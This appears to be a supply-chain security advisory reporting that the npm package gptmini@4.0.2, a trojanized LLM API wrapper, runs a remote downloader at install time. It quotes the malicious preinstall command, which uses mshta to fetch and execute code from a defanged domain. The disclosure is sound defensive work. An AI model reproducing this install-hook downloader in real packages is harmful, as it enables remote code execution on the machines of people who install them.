LWA-2026-6025 MAL-2026-6537 ↗ confirmed malware

gptmini@4.0.2

Malicious code in gptmini (npm)

T1195.002 · Compromise Software Supply ChainT1059 · Command and Scripting InterpreterT1218.005 · MshtaT1105 · Ingress Tool Transfer

Analysis

Package gptmini@4.0.2 is a trojanized LLM API wrapper that executes a remote downloader during installation. The preinstall hook (node preinstall.js) runs child_process.exec('cmd /c "mshta hxxp://fixars[.]top"'), which uses the Windows mshta.exe binary (a known LOLBin) to fetch and execute arbitrary code from fixars[.]top on the installer's machine. The main module appears to be a functional LLM client, masking the malicious install-time behaviour.

analyzed by
Leitwacht
first seen
Jun 26, 2026, 06:08 PM
analyzed
Jun 26, 2026, 06:09 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.